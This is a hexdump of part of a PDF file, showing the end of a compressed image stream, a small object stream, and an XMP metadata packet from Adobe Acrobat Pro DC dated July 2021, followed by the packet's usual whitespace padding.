00001600: 0551 4029 d100 b6b3 0a62 d7d6 30d4 8457  .Q@).....b..0..W
00001610: 0110 141b 8020 414d 06a0 0200 2d85 32cf  ..... AM....-.2.
00001620: 27a4 9b2f 49d3 c5c6 78c9 d271 a587 7777  '../I...x..q..ww
00001630: 7048 cec9 c4ca 10c1 5c08 8001 4e6c 1e20  pH......\...Nl. 
00001640: 6028 c06d ee9b c29d 2f93 ba79 c80f 44bc  `(.m..../..y..D.
00001650: 22f2 5b9b a811 6ada a073 bdbc 2806 294a  ".[...j..s..(.)J
00001660: 4292 b643 0140 0c26 1be6 e82c b6a0 c684  B..C.@.&...,....
00001670: 1241 6444 41b0 88a3 a615 0a51 8c80 e413  .AdDA......Q....
00001680: 4000 5b80 25a7 054a 8527 bbca 33ca 63bc  @.[.%..J.'..3.c.
00001690: cdd7 f935 7921 7757 6774 1033 d01c 8554  ...5y!wWgt.3...T
000016a0: e900 090e 1492 2081 6298 5280 0c22 d1f2  ...... .b.R.."..
000016b0: 0ce2 9fd2 0b8a 336d 79b2 bbe2 eec5 aca0  ......3my.......
000016c0: f202 6220 050b 8018 c043 a620 185a 6163  ..b .....C. .Zac
000016d0: a36d 1252 3bf2 727b c9e4 c215 57c2 a0a0  .m.R;.r{....W...
000016e0: bba6 7801 0ca0 00d0 0189 8a10 8e1c 1a8a  ..x.............
000016f0: 678a b3be 16b5 695c 9c2b 962b a028 9849  g.....i\.+.+.(.I
00001700: 87cf 55fc 8169 1111 38e1 a590 1105 0045  ..U..i..8......E
00001710: 34d1 584a 0010 34d0 a544 505c 4012 4905  4.XJ..4..DP\@.I.
00001720: c0bc 1a9a a4f8 9cf9 9c00 fca1 5679 290e  ............Vy).
00001730: 0f0a 16c1 4541 54a2 6000 88d8 8808 035e  ....EAT.`......^
00001740: e760 ac59 b12b 0bb8 08a9 78f7 9a20 16f7  .`.Y.+....x.. ..
00001750: 037a c68e 98b3 3866 a39a e77b 5c1e a507  .z....8f...{\...
00001760: e382 8f4b 0444 b108 c0a0 2680 8d93 0888  ...K.D....&.....
00001770: 8804 636c d661 0030 094c 1101 0808 0d90  ..cl.a.0.L......
00001780: 1061 e089 8062 4930 d951 0511 1474 c089  .a...bI0.Q...t..
00001790: 0d14 0f13 d34c f453 5500 434e 9151 aa4a  .....L.SU.CN.Q.J
000017a0: fd25 926a 3bba 15e5 107a 33c2 e2a2 2272  .%.j;....z3..."r
000017b0: 82b4 84c3 46f9 8c6c 9402 0dde aa4c d894  ....F..l.....L..
000017c0: e5a7 7719 5643 0a72 8494 b8aa 9a51 2809  ..w.VC.r.....Q(.
000017d0: ca22 530c 2940 04c0 6200 8046 c846 ee0d  ."S.)@..b..F.F..
000017e0: e7a1 53a9 a4e9 29a7 2b3a 398a 0f08 ac0b  ..S...).+:9.....
000017f0: 12b6 a2a5 4ca7 0188 0816 9400 2374 161a  ....L.......#t..
00001800: cad2 70b3 2072 8700 828b 3280 2083 e50a  ..p. r....2. ...
00001810: 0d8c 5105 4d14 555d 9845 12ce 949c 73ea  ..Q.M.U].E....s.
00001820: 7349 ebc8 a137 d692 ceab b9c8 f2fc ad70  sI...7.........p
00001830: 0805 a234 eb64 3a69 c4c6 8400 00c6 8471  ...4.d:i.......q
00001840: 6d21 52e9 2de9 d668 a8e3 2aba aaee 655e  m!R.-..h..*...e^
00001850: 9e00 c8ae 43a2 7121 ca40 8c0c 0518 0d9b  ....C.q!.@......
00001860: 2d75 6342 5192 52b9 a003 9344 a538 c539  -ucBQ.R....D.8.9
00001870: 5051 0c92 0597 b8bb 4f5a 9bbc 3c39 c9f2  PQ......OZ..<9..
00001880: 71a5 d915 658c aa40 8d21 58a2 3630 4039  q...e..@.!X.60@9
00001890: 8a30 008d f020 374d 679b 13ae 5e97 6503  .0... 7Mg...^.e.
000018a0: 3b4a 337d e648 772a 2638 2eb8 a820 2701  ;J3}.Hw*&8... '.
000018b0: 2801 6fb4 52b7 011e 89ad 2c60 0a88 c648  (.o.R.....,`...H
000018c0: 0209 aaa2 008a 0aa0 4141 6491 1452 53d8  ........AAd..RS.
000018d0: 44a8 b27c 9d28 12ab 1294 a277 558a e6a4  D..|.(.....wU...
000018e0: 9e42 11e4 5338 2063 5077 0a20 7851 11be  .B..S8 cPw. xQ..
000018f0: 46c4 6e9a 6a7f 3b3c be4d 0949 d9cd 23bc  F.n.j.;<.M.I..#.
00001900: 2ca2 4402 2491 4ca2 861a 6418 014a 0223  ,.D.$.L...d..J.#
00001910: 601a c0c6 8104 4c03 1a1a 822f 223c f290  `.....L..../"<..
00001920: 140e 666e 1a88 0073 8a9a 9cd8 5a5c a9b3  ..fn...s....Z\..
00001930: ac80 f051 757a b428 d005 8a62 1935 9381  ...Quz.(...b.5..
00001940: 8a06 010a 4164 2036 2301 6829 3e72 5512  ....Ad 6#.h)>rU.
00001950: 4293 0b37 549b cb3d 3dbb a758 767d 281c  B..7T..==..Xv}(.
00001960: e881 4020 4130 9486 21a0 1774 c30e da7b  ..@ A0..!..t...{
00001970: 1a45 3138 563c 5110 6ed5 b0ac 5000 801a  .E18V<Q.n...P...
00001980: 0b98 090b e541 b154 aa75 355f 66e4 9af0  .....A.T.u5_f...
00001990: bcac 2032 94a2 b579 e202 0612 8046 8904  .. 2...y.....F..
000019a0: c110 1189 8c23 0b16 5a32 a732 64a4 e338  .....#..Z2.2d..8
000019b0: e72a efae 8bbb 24f0 f749 1516 4ce9 9140  .*....$..I..L..@
000019c0: aeae 3128 98a0 0608 085b 3680 c694 6324  ..1(.....[6...c$
000019d0: 6b81 3500 5104 b748 1421 1888 3538 0e45  k.5.Q..H.!..58.E
000019e0: 7440 4479 e540 9dd2 64a4 f354 39bc faec  t@Dy.@..d..T9...
000019f0: e8ba cec8 56ab cba6 99ce 9270 54c2 348c  ....V......pT.4.
00001a00: 0025 0b18 516e 9544 9325 27d9 cd36 9772  .%..Qn.D.%'..6.r
00001a10: 745d e127 77aa 4b28 8a67 5089 8575 0189  t].'w.K(.gP..u..
00001a20: 84a5 1028 4006 ddb4 0634 1b18 b257 0c43  ...(@....4...W.C
00001a30: 8f79 3962 93a3 266a ecc0 3729 5cab f3f9  .y9b..&j..7)\...
00001a40: d9e5 f268 4a4e ce69 1de1 6512 2011 248a  ...hJN.i..e. .$.
00001a50: 6514 30d3 20c0 0a50 111b 00de 2cd7 2cad  e.0. ..P....,.,.
00001a60: 24d4 f9d8 1174 39a5 1777 3545 3745 8a64  $....t9..w5E7E.d
00001a70: ce2a 5338 94a6 29a8 8846 2184 6b53 1a16  .*S8..)..F!.kS..
00001a80: 3801 cc82 6d10 45ec 8b9a 34aa 3a93 2f8d  8...m.E...4.:./.
00001a90: 2cf8 6a83 3ca8 d642 673d 82f0 801c 457a  ,.j.<..Bg=....Ez
00001aa0: cd2c 2e7d 8021 c8b1 6de4 cc09 b12e 39ca  .,.}.!..m.....9.
00001ab0: 3284 e79c a054 dfe5 2b00 8944 0448 5135  2....T..+..D.HQ5
00001ac0: 2111 a222 50b6 0000 88c0 02cb 5e18 d209  !.."P.......^...
00001ad0: 0a2b a020 8b61 5726 414d 2591 0141 b828  .+. .aW&AM%..A.(
00001ae0: 516a 4e89 b28a 8645 695d c535 1330 94e4  QjN....Ei].5.0..
00001af0: 33ca 0531 4c03 0101 013c 4040 5b8d ed93  3..1L....<@@[...
00001b00: 5761 993f a74e ff00 146f 097a 9ecc d795  Wa.?.N...o.z....
00001b10: d479 5e4d 21d5 58e6 5143 09d6 8898 c226  .y^M!.X.QC.....&
00001b20: 30d8 530a 2dc3 26da 646c 169e 345f e28c  0.S.-.&.dl..4_..
00001b30: 0450 4d52 0b62 8faa 2cdc 9425 f749 3e5a  .PMR.b..,..%.I>Z
00001b40: 9bc2 55df 64d5 4174 4a53 160a 266a 27a4  ..U.d.AtJS..&j'.
00001b50: 511b 0220 2401 008d 908d dc1b c052 71cf  Q.. $........Rq.
00001b60: a9cd 27af 2284 df5a 4b3a aee7 23cb f2b5  ..'."..ZK:..#...
00001b70: c020 1688 d3ad 90e9 a713 1a10 0003 1a11  . ..............
00001b80: c5b6 8282 093b 209b b205 a092 242a 6996  .....; .....$*i.
00001b90: 2230 2940 0a50 b311 b606 ee34 0802 071a  "0)@.P.....4....
00001ba0: 12a8 88a4 2d45 f260 4011 8c45 cc00 0088  ....-E.`@..E....
00001bb0: 64f4 cb16 7b32 6419 514a 9cca 122a e8aa  d...{2d.QJ...*..
00001bc0: e2f6 f467 b226 5782 1d13 5f64 2814 440c  ...g.&W..._d(.D.
00001bd0: 501a 2236 2306 f066 ccb9 3b66 bc96 9cdb  P."6#..f..;f....
00001be0: bd51 e575 d039 c0af 09d2 2207 31cc 26a4  .Q.u.9....".1.&.
00001bf0: 6382 4725 88db d3b3 866d 418d 2228 888b  c.G%.....mA."(..
00001c00: 534d 0106 c6a8 5000 0068 0343 8e10 1b79  SM....P..h.C...y
00001c10: 52c9 e4f3 4e99 b33d 9ee5 37c9 21e6 5452  R...N..=..7.!.TR
00001c20: 5141 2078 3ba1 15ac 2475 ab6a 180a 6049  QA x;...$u.j..`I
00001c30: 4010 2085 1b7b ab76 bd4f 7905 79c9 36de  @. ..{.v.Oy.y.6.
00001c40: a4b7 4129 5e0d 4144 690c 0a26 4cc0 6a22  ..A)^.ADi..&L.j"
00001c50: 3751 0083 4f31 8208 9a06 d2aa 20b0 2288  7Q..O1...... .".
00001c60: 03c0 9480 a070 9cd5 045b 8a08 08bc 9669  .....p...[.....i
00001c70: 24ce f9ef 2149 cef2 33e4 d47b 7c55 d122  $...!I..3..{|U."
00001c80: a055 d2ae 810c 5205 1244 4a82 c511 8059  .U....R..DJ....Y
00001c90: 1035 96b8 3d48 b264 f092 9c8f 38dc 0c06  .5..=H.d....8...
00001ca0: a055 c5d8 ea2a 9192 50e5 0a45 1a06 4c44  .U...*..P..E..LD
00001cb0: 42da cb4d b1a4 4599 1664 c445 145f 3728  B..M..E..d.E._7(
00001cc0: 0041 4480 0104 0aa2 bd4b a639 5150 5393  .AD......K.9QPS.
00001cd0: 2fb0 2184 b05d ec46 3018 58af 345d 49a6  /.!..].F0.X.4]I.
00001ce0: d124 b935 6956 5272 55ce 5215 5544 4ef0  .$.5iVRrU.R.UDN.
00001cf0: 0aa2 6ac4 133d c0e2 0585 22db c316 da13  ..j..=....".....
00001d00: 7139 4a72 890c 1129 8040 430c 3605 a004  q9Jr...).@C.6...
00001d10: 4d66 1054 4d40 115b c2a0 b629 1001 6501  Mf.TM@.[...)..e.
00001d20: 500e 45f3 b2a0 5177 b64d 5d86 64fe 9d3b  P.E...Qw.M].d..;
00001d30: fc51 ba96 754d 7318 0a59 61c0 4c22 0000  .Q..uMs..Ya.L"..
00001d40: 0f48 0888 8db0 5cda 3b26 da64 6c16 9e34  .H....\.;&.dl..4
00001d50: 5fe2 8dd4 9538 9944 301c 9259 00c5 1010  _....8.D0..Y....
00001d60: 1051 7b02 1640 73d1 8082 29a8 416c a979  .Q{..@s...).Al.y
00001d70: 12c4 c79a f2f3 e0ca 12b3 95a8 7812 1482  ............x...
00001d80: 7af3 c277 c96d 8204 54a5 bbc2 354e 7bd4  z..w.m..T...5N{.
00001d90: e240 729b af0f 1372 4a50 d281 4e88 2608  .@r....rJP..N.&.
00001da0: 9de9 e548 09ca 0781 0543 c6f9 8dd3 692c  ...H.....C....i,
00001db0: 6810 4900 4934 5277 474e 528b 54d2 5dd9  h.I.I4RwGNR.T.].
00001dc0: 0d31 5766 c384 9134 e6cb b994 0249 8455  .1Wf...4.....I.U
00001dd0: 2456 7b33 ca86 4c01 7508 429a 90aa 6be4  $V{3..L.u.B...k.
00001de0: 4440 0216 2cdd 3799 7b64 d5d8 664f e9d3  D@..,.7.{d..fO..
00001df0: bfc5 1bcb 9524 a709 65cc f27c a688 3c3b  .....$..e..|..<;
00001e00: 2825 1326 2262 8089 440c 164a 251b 7068  (%.&"b..D..J%.ph
00001e10: 4c9b 6991 b05a 78d1 7f8a 3542 2270 888a  L.i..Zx...5B"p..
00001e20: e293 b347 82a4 0000 001a 026e e52e e92f  ...G.......n.../
00001e30: c832 82e0 ece1 293a 3d2c 6011 0491 5d25  .2....):=,`...]%
00001e40: 5410 0b22 2052 9846 d9a8 32ab 9ce6 99f3  T.." R.F..2.....
00001e50: ddee 72c9 525a 92c3 94a6 9881 d340 0e63  ..r.RZ.......@.c
00001e60: 944d 444c 0340 aa18 a206 2440 44a2 0203  .MDL.@....$@D...
00001e70: 0b7b 6b94 9732 e6c4 8cf8 4942 4c71 2bbb  .{k..2....IBLq+.
00001e80: c100 c055 0a75 4c20 0601 2884 0c71 0b61  ...U.uL ..(..q.a
00001e90: c234 db42 8207 00a0 2002 0f02 a864 9029  .4.B.... ....d.)
00001ea0: 5404 0411 0110 1790 5072 6591 cef2 ced9  T.......Pre.....
00001eb0: 51fa 439c 8bc8 cf00 7457 31d3 9390 03bc  Q.C.....tW1.....
00001ec0: 1d34 d232 4a00 a862 a622 539c 6382 d800  .4.2J..b."S.c...
00001ed0: 0b11 8b5d e539 cf2d bac8 2e72 bb8c 86f0  ...].9.-...r....
00001ee0: f2f2 f260 af38 4140 5912 c0c2 2268 2626  ...`.8A@Y..."h&&
00001ef0: 8c40 2c51 bb6b 2b18 e565 0481 991c 9ab9  .@,Q.k+..e......
00001f00: 322e 0229 8b2a 03ce c916 6b29 cf09 d92f  2..).*....k).../
00001f10: 382f 2512 66bc 90cf 2919 303b c82a 648b  8/%.f...).0;.*d.
00001f20: 4828 d281 ddd2 0884 6c5f 40d6 3a9d cde7  H(......l_@.:...
00001f30: e9b5 3708 e329 401e 555d 45ce 9944 0e09  ..7..)@.U]E..D..
00001f40: d302 8012 2022 0230 2c46 161a cec6 0248  .... ".0,F.....H
00001f50: a009 9c00 022d 813d d905 3411 728a 20ee  .....-.=..4.r. .
00001f60: 2081 6755 627d 929e 26ea 4ee4 7948 ef69   .gUb}..&.N.yH.i
00001f70: bf90 4891 0e53 a810 2a85 3c40 0444 0023  ..H..S..*.<@.D.#
00001f80: 670e d7b9 2856 3496 e667 8082 a2ea 88a8  g...(V4..g......
00001f90: 0360 40d4 0b4b b568 3254 e668 1252 34aa  .`@..K.h2T.h.R4.
00001fa0: 6721 55e0 cb19 71ae a8aa 89d3 31a9 0984  g!U...q.....1...
00001fb0: a268 0d91 b618 8359 986a 4688 0aa7 1c02  .h.....Y.jF.....
00001fc0: 2d01 0041 0021 c99c 020a 1a68 8037 4451  -..A.!.....h.7DQ
00001fd0: 2318 c610 bfff d2d5 58c6 3084 6318 c211  #.......X.0.c...
00001fe0: 8c63 0846 318c 2118 c630 8463 18c2 118c  .c.F1.!..0.c....
00001ff0: 6308 4631 8c21 18c6 3084 6318 c211 8c63  c.F1.!..0.c....c
00002000: 0846 318c 2118 c630 8463 18c2 118c 6308  .F1.!..0.c....c.
00002010: 4631 8c21 18c6 3084 6318 c211 8c63 0846  F1.!..0.c....c.F
00002020: 318c 2118 c630 8463 18c2 118c 6308 4631  1.!..0.c....c.F1
00002030: 8c21 18c6 3084 6318 c211 8c63 0846 318c  .!..0.c....c.F1.
00002040: 2118 c630 85ff d90d 0a65 6e64 7374 7265  !..0.....endstre
00002050: 616d 0d65 6e64 6f62 6a0d 3120 3020 6f62  am.endobj.1 0 ob
00002060: 6a0d 3c3c 2f46 696c 7465 722f 466c 6174  j.<</Filter/Flat
00002070: 6544 6563 6f64 652f 4669 7273 7420 3134  eDecode/First 14
00002080: 2f4c 656e 6774 6820 3132 362f 4e20 332f  /Length 126/N 3/
00002090: 5479 7065 2f4f 626a 5374 6d3e 3e73 7472  Type/ObjStm>>str
000020a0: 6561 6d0d 0a68 de32 5330 5030 5730 b154  eam..h.2S0P0W0.T
000020b0: b050 b034 52b0 b1d1 77ce 2fcd 2b51 30d4  .P.4R...w./.+Q0.
000020c0: 77cb 2c2a 2e01 4a19 2804 e9fb 24c2 9921  w.,*..J.(...$..!
000020d0: 9505 a9fa fea5 2539 9979 a9c5 7676 400d  ......%9.y..vv@.
000020e0: 8e40 ad20 9980 c4a2 54a0 4e33 88b2 cc92  .@. ....T.N3....
000020f0: 9c54 0da7 9cc4 bc6c 8580 c4f4 544d b052  .T.....l....TM.R
00002100: 9768 4363 b074 4464 14c8 5ea0 8d79 a539  .hCc.tDd..^..y.9
00002110: 39b1 fac1 faee f921 f976 7600 0106 00a6  9......!.vv.....
00002120: a727 360d 0a65 6e64 7374 7265 616d 0d65  .'6..endstream.e
00002130: 6e64 6f62 6a0d 3220 3020 6f62 6a0d 3c3c  ndobj.2 0 obj.<<
00002140: 2f4c 656e 6774 6820 3332 3035 2f53 7562  /Length 3205/Sub
00002150: 7479 7065 2f58 4d4c 2f54 7970 652f 4d65  type/XML/Type/Me
00002160: 7461 6461 7461 3e3e 7374 7265 616d 0d0a  tadata>>stream..
00002170: 3c3f 7870 6163 6b65 7420 6265 6769 6e3d  <?xpacket begin=
00002180: 22ef bbbf 2220 6964 3d22 5735 4d30 4d70  "..." id="W5M0Mp
00002190: 4365 6869 487a 7265 537a 4e54 637a 6b63  CehiHzreSzNTczkc
000021a0: 3964 223f 3e0a 3c78 3a78 6d70 6d65 7461  9d"?>.<x:xmpmeta
000021b0: 2078 6d6c 6e73 3a78 3d22 6164 6f62 653a   xmlns:x="adobe:
000021c0: 6e73 3a6d 6574 612f 2220 783a 786d 7074  ns:meta/" x:xmpt
000021d0: 6b3d 2241 646f 6265 2058 4d50 2043 6f72  k="Adobe XMP Cor
000021e0: 6520 352e 362d 6330 3137 2039 312e 3136  e 5.6-c017 91.16
000021f0: 3434 3634 2c20 3230 3230 2f30 362f 3135  4464, 2020/06/15
00002200: 2d31 303a 3230 3a30 3520 2020 2020 2020  -10:20:05       
00002210: 2022 3e0a 2020 203c 7264 663a 5244 4620   ">.   <rdf:RDF 
00002220: 786d 6c6e 733a 7264 663d 2268 7474 703a  xmlns:rdf="http:
00002230: 2f2f 7777 772e 7733 2e6f 7267 2f31 3939  //www.w3.org/199
00002240: 392f 3032 2f32 322d 7264 662d 7379 6e74  9/02/22-rdf-synt
00002250: 6178 2d6e 7323 223e 0a20 2020 2020 203c  ax-ns#">.      <
00002260: 7264 663a 4465 7363 7269 7074 696f 6e20  rdf:Description 
00002270: 7264 663a 6162 6f75 743d 2222 0a20 2020  rdf:about="".   
00002280: 2020 2020 2020 2020 2078 6d6c 6e73 3a78           xmlns:x
00002290: 6d70 3d22 6874 7470 3a2f 2f6e 732e 6164  mp="http://ns.ad
000022a0: 6f62 652e 636f 6d2f 7861 702f 312e 302f  obe.com/xap/1.0/
000022b0: 220a 2020 2020 2020 2020 2020 2020 786d  ".            xm
000022c0: 6c6e 733a 6463 3d22 6874 7470 3a2f 2f70  lns:dc="http://p
000022d0: 7572 6c2e 6f72 672f 6463 2f65 6c65 6d65  url.org/dc/eleme
000022e0: 6e74 732f 312e 312f 220a 2020 2020 2020  nts/1.1/".      
000022f0: 2020 2020 2020 786d 6c6e 733a 786d 704d        xmlns:xmpM
00002300: 4d3d 2268 7474 703a 2f2f 6e73 2e61 646f  M="http://ns.ado
00002310: 6265 2e63 6f6d 2f78 6170 2f31 2e30 2f6d  be.com/xap/1.0/m
00002320: 6d2f 220a 2020 2020 2020 2020 2020 2020  m/".            
00002330: 786d 6c6e 733a 7064 663d 2268 7474 703a  xmlns:pdf="http:
00002340: 2f2f 6e73 2e61 646f 6265 2e63 6f6d 2f70  //ns.adobe.com/p
00002350: 6466 2f31 2e33 2f22 3e0a 2020 2020 2020  df/1.3/">.      
00002360: 2020 203c 786d 703a 4d6f 6469 6679 4461     <xmp:ModifyDa
00002370: 7465 3e32 3032 312d 3037 2d31 3754 3230  te>2021-07-17T20
00002380: 3a35 393a 3234 2d30 353a 3030 3c2f 786d  :59:24-05:00</xm
00002390: 703a 4d6f 6469 6679 4461 7465 3e0a 2020  p:ModifyDate>.  
000023a0: 2020 2020 2020 203c 786d 703a 4372 6561         <xmp:Crea
000023b0: 7465 4461 7465 3e32 3032 312d 3037 2d31  teDate>2021-07-1
000023c0: 3754 3230 3a35 353a 3230 2d30 353a 3030  7T20:55:20-05:00
000023d0: 3c2f 786d 703a 4372 6561 7465 4461 7465  </xmp:CreateDate
000023e0: 3e0a 2020 2020 2020 2020 203c 786d 703a  >.         <xmp:
000023f0: 4d65 7461 6461 7461 4461 7465 3e32 3032  MetadataDate>202
00002400: 312d 3037 2d31 3754 3230 3a35 393a 3234  1-07-17T20:59:24
00002410: 2d30 353a 3030 3c2f 786d 703a 4d65 7461  -05:00</xmp:Meta
00002420: 6461 7461 4461 7465 3e0a 2020 2020 2020  dataDate>.      
00002430: 2020 203c 786d 703a 4372 6561 746f 7254     <xmp:CreatorT
00002440: 6f6f 6c3e 4164 6f62 6520 4163 726f 6261  ool>Adobe Acroba
00002450: 7420 5072 6f20 4443 2028 3332 2d62 6974  t Pro DC (32-bit
00002460: 2920 3231 2e35 2e32 3030 3538 3c2f 786d  ) 21.5.20058</xm
00002470: 703a 4372 6561 746f 7254 6f6f 6c3e 0a20  p:CreatorTool>. 
00002480: 2020 2020 2020 2020 3c64 633a 666f 726d          <dc:form
00002490: 6174 3e61 7070 6c69 6361 7469 6f6e 2f70  at>application/p
000024a0: 6466 3c2f 6463 3a66 6f72 6d61 743e 0a20  df</dc:format>. 
000024b0: 2020 2020 2020 2020 3c78 6d70 4d4d 3a44          <xmpMM:D
000024c0: 6f63 756d 656e 7449 443e 7575 6964 3a38  ocumentID>uuid:8
000024d0: 3037 3865 3261 652d 6437 3863 2d34 6633  078e2ae-d78c-4f3
000024e0: 652d 6164 6565 2d30 6164 3363 6233 3537  e-adee-0ad3cb357
000024f0: 6633 353c 2f78 6d70 4d4d 3a44 6f63 756d  f35</xmpMM:Docum
00002500: 656e 7449 443e 0a20 2020 2020 2020 2020  entID>.         
00002510: 3c78 6d70 4d4d 3a49 6e73 7461 6e63 6549  <xmpMM:InstanceI
00002520: 443e 7575 6964 3a37 3566 3362 3533 622d  D>uuid:75f3b53b-
00002530: 3664 6138 2d34 6361 362d 6163 3664 2d35  6da8-4ca6-ac6d-5
00002540: 6538 6536 3466 3536 3332 383c 2f78 6d70  e8e64f56328</xmp
00002550: 4d4d 3a49 6e73 7461 6e63 6549 443e 0a20  MM:InstanceID>. 
00002560: 2020 2020 2020 2020 3c70 6466 3a50 726f          <pdf:Pro
00002570: 6475 6365 723e 4164 6f62 6520 4163 726f  ducer>Adobe Acro
00002580: 6261 7420 5072 6f20 4443 2028 3332 2d62  bat Pro DC (32-b
00002590: 6974 2920 3231 2e35 2e32 3030 3538 3c2f  it) 21.5.20058</
000025a0: 7064 663a 5072 6f64 7563 6572 3e0a 2020  pdf:Producer>.  
000025b0: 2020 2020 3c2f 7264 663a 4465 7363 7269      </rdf:Descri
000025c0: 7074 696f 6e3e 0a20 2020 3c2f 7264 663a  ption>.   </rdf:
000025d0: 5244 463e 0a3c 2f78 3a78 6d70 6d65 7461  RDF>.</x:xmpmeta
000025e0: 3e0a 2020 2020 2020 2020 2020 2020 2020  >.              
000025f0: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002600: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002610: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002620: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002630: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002640: 2020 2020 2020 0a20 2020 2020 2020 2020        .         
00002650: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002660: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002670: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002680: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002690: 2020 2020 2020 2020 2020 2020 2020 2020                  
000026a0: 2020 2020 2020 2020 2020 200a 2020 2020             .    
000026b0: 2020 2020 2020 2020 2020 2020 2020 2020                  
000026c0: 2020 2020 2020 2020 2020 2020 2020 2020                  
000026d0: 2020 2020 2020 2020 2020 2020 2020 2020                  
000026e0: 2020 2020 2020 2020 2020 2020 2020 2020                  
000026f0: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002700: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002710: 0a20 2020 2020 2020 2020 2020 2020 2020  .               
00002720: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002730: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002740: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002750: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002760: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002770: 2020 2020 200a 2020 2020 2020 2020 2020       .          
00002780: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002790: 2020 2020 2020 2020 2020 2020 2020 2020                  
000027a0: 2020 2020 2020 2020 2020 2020 2020 2020                  
000027b0: 2020 2020 2020 2020 2020 2020 2020 2020                  
000027c0: 2020 2020 2020 2020 2020 2020 2020 2020                  
000027d0: 2020 2020 2020 2020 2020 0a20 2020 2020            .     
000027e0: 2020 2020 2020 2020 2020 2020 2020 2020                  
000027f0: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002800: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002810: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002820: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002830: 2020 2020 2020 2020 2020 2020 2020 200a                 .
00002840: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002850: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002860: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002870: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002880: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002890: 2020 2020 2020 2020 2020 2020 2020 2020                  
000028a0: 2020 2020 0a20 2020 2020 2020 2020 2020      .           
000028b0: 2020 2020 2020 2020 2020 2020 2020 2020                  
000028c0: 2020 2020 2020 2020 2020 2020 2020 2020                  
000028d0: 2020 2020 2020 2020 2020 2020 2020 2020                  
000028e0: 2020 2020 2020 2020 2020 2020 2020 2020                  
000028f0: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002900: 2020 2020 2020 2020 200a 2020 2020 2020           .      
00002910: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002920: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002930: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002940: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002950: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002960: 2020 2020 2020 2020 2020 2020 2020 0a20                . 
00002970: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002980: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002990: 2020 2020 2020 2020 2020 2020 2020 2020                  
000029a0: 2020 2020 2020 2020 2020 2020 2020 2020                  
000029b0: 2020 2020 2020 2020 2020 2020 2020 2020                  
000029c0: 2020 2020 2020 2020 2020 2020 2020 2020                  
000029d0: 2020 200a 2020 2020 2020 2020 2020 2020     .            
000029e0: 2020 2020 2020 2020 2020 2020 2020 2020                  
000029f0: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002a00: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002a10: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002a20: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002a30: 2020 2020 2020 2020 0a20 2020 2020 2020          .       
00002a40: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002a50: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002a60: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002a70: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002a80: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002a90: 2020 2020 2020 2020 2020 2020 200a 2020               .  
00002aa0: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002ab0: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002ac0: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002ad0: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002ae0: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002af0: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002b00: 2020 0a20 2020 2020 2020 2020 2020 2020    .             
00002b10: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002b20: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002b30: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002b40: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002b50: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002b60: 2020 2020 2020 200a 2020 2020 2020 2020         .        
00002b70: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002b80: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002b90: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002ba0: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002bb0: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002bc0: 2020 2020 2020 2020 2020 2020 0a20 2020              .   
00002bd0: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002be0: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002bf0: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002c00: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002c10: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002c20: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002c30: 200a 2020 2020 2020 2020 2020 2020 2020   .              
00002c40: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002c50: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002c60: 2020 2020 2020 2020 2020 2020 2020 2020                  
00002c70: 2020 2020 2020 2020 2020 2020 2020 2020                  
